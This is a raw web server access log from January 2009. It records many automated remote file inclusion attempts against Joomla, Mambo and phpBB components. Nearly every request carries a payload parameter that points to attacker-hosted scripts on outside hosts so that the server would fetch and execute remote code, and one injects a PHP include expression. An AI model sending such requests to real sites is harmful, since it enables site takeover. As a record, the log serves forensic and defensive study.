88.199.57.35 - - [30/Jan/2009:08:11:35 -0800] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.55.179.19 - - [30/Jan/2009:08:11:50 -0800] "GET /logs/access_080529.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.55.179.19 - - [30/Jan/2009:08:11:50 -0800] "GET /logs/access_080216.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:11:54 -0800] "GET /logs/access_080429.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.10.164.34 - - [30/Jan/2009:08:11:55 -0800] "GET /logs/access_080529.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://drcauto.com/ubbthreads/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.67.202.189 - - [30/Jan/2009:08:11:55 -0800] "GET /logs/access_080925.log/components/errors.php?error=http://www.szczepanski.net.pl/my/testoweforum/templates/index.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
72.10.164.34 - - [30/Jan/2009:08:11:59 -0800] "GET /logs/access_080808.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://drcauto.com/ubbthreads/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:08:12:08 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:08:12:08 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:08:12:08 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:08:12:09 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:12:16 -0800] "GET /logs/access_080823.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.0.157 - - [30/Jan/2009:08:12:17 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://azde.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.157 - - [30/Jan/2009:08:12:18 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://azde.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.157 - - [30/Jan/2009:08:12:19 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://azde.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:12:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:12:22 -0800] "GET /logs/access_081113.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:12:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:12:23 -0800] "GET /logs/access_081222.log//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:12:23 -0800] "GET /logs//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:12:23 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:12:23 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95190 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:12:23 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:12:27 -0800] "GET /logs/access_080504.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:12:30 -0800] "GET /logs/access_081222.log%20%20//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:12:30 -0800] "GET /logs/access_080414.log%20%20//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:12:30 -0800] "GET /logs/access_081207.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:12:33 -0800] "GET /logs/access_080403.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:08:12:41 -0800] "GET /logs/access_081113.log HTTP/1.0" 200 1310720 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.0.157 - - [30/Jan/2009:08:12:55 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://azde.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:12:56 -0800] "GET /logs//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:12:56 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:13:03 -0800] "GET /logs/access_080511.log/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:13:05 -0800] "GET /logs//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:13:06 -0800] "GET /senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:13:06 -0800] "GET /logs/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:13:06 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:13:10 -0800] "GET /logs/access_080414.log//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.98.1.242 - - [30/Jan/2009:08:13:11 -0800] "GET /index.php?pagina1=http://sebastians.wewillhostit.com/id.txt???? HTTP/1.1" 200 94803 "-" "libwww-perl/5.813" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:13:30 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:31 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:31 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:31 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 200 95242 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:31 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 200 95274 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:32 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:32 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:13:34 -0800] "GET /logs/access_080409.log/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:35 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:35 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 200 95242 "-" "libwww-perl/5.808" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:13:36 -0800] "GET /index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 94754 "-" "libwww-perl/5.823" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:37 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:13:41 -0800] "GET /logs/access_081103.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:13:48 -0800] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:49 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:13:49 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95169 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:50 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:13:50 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:13:51 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:13:52 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:13:58 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:13:58 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:13:58 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:13:58 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:14:01 -0800] "GET /logs/access_080426.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:14:02 -0800] "GET /logs/access_080501.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.103.135.237 - - [30/Jan/2009:08:14:07 -0800] "GET /logs/access.log/!scanhttp://shahfun.com/bb/cache/conf.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
82.103.135.237 - - [30/Jan/2009:08:14:07 -0800] "GET /logs/!scanhttp://shahfun.com/bb/cache/conf.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
82.103.135.237 - - [30/Jan/2009:08:14:07 -0800] "GET /!scanhttp://shahfun.com/bb/cache/conf.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:14:15 -0800] "GET /logs/access_081125.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:14:17 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:14:22 -0800] "GET /logs/access_080805.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:14:38 -0800] "GET /logs/access_080115.log//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:39 -0800] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:40 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95153 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:40 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:14:41 -0800] "GET /logs/access_080611.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:42 -0800] "GET /logs/access_080501.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:42 -0800] "GET /logs/access_081113.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:43 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95190 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:43 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:14:45 -0800] "GET /logs/access_080122.log//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:47 -0800] "GET /logs/access_081207.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:48 -0800] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:49 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95169 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:49 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:14:50 -0800] "GET /logs/access_080501.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:14:51 -0800] "GET /logs/access_080428.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:14:54 -0800] "GET /logs/access_081113.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:14:55 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95174 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:14:56 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:15:03 -0800] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:15:04 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.18.237 - - [30/Jan/2009:08:15:04 -0800] "GET /logs/access_071028.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:15:05 -0800] "GET /logs/access_081113.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
218.234.18.127 - - [30/Jan/2009:08:15:05 -0800] "GET /logs/access_080320.log//path/index.php?option=com_extplorer&action=show_error&dir=http://kadin.or.id/mail/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:15:05 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95190 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:15:05 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:15:10 -0800] "GET /logs/access_081207.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:15:10 -0800] "GET /logs/access_081207.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.221.240.132 - - [30/Jan/2009:08:15:15 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
